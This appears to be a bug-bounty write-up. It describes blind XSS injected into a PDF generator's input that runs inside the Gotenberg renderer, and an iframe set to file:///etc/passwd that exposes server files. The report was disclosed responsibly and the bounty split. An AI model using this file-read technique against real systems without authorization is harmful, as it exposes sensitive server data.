Blind XSS To SSRF
During bug hunting in a private bug bounty program, I came across a feature within the application that allowed for the generation of PDF documents. Since the user input was reflected in the generated PDF documents, I decided to try injecting HTML and XSS payloads.
I used a well-known tool called XSSHunter, which allows us to find blind cross-site scripting vulnerabilities. To my surprise, my payload was immediately executed and I was able to retrieve the screenshot and the following details on XSSHunter.
Further investigation revealed that the payload had been executed on the file path
“file:///gotenberg/e86fbc55ef893d878821c1bc76c3b1e3/index.html”.
Gotenberg is an open-source API for converting HTML, Markdown, and Office documents to PDF. It uses a set of configurable rendering engines to convert the input document to a PDF file. The Gotenberg parser is the component of Gotenberg that takes the input document and converts it into a format that can be rendered by the engines.
Upon further testing, I discovered that the Gotenberg parser was vulnerable to server-side request forgery attacks. I was able to successfully execute a payload that included an iframe with the src set to “file:///etc/passwd”. This allowed me to view the contents of the “/etc/passwd” file.
This type of vulnerability allows an attacker to access sensitive files on a server by manipulating the file path in a way that allows them to traverse the file system. This can potentially lead to the exposure of sensitive information and even complete system compromise.
I immediately reported my findings to the security team, who classified the vulnerability as high. However, another security researcher had also reported the vulnerability at the same time. As a result, the team decided to split the bounty and I received $500.
The XSS Hunter has been deprecated and is no longer in use. A new version has been launched by Truffle Security, available at https://xsshunter.trufflesecurity.com.
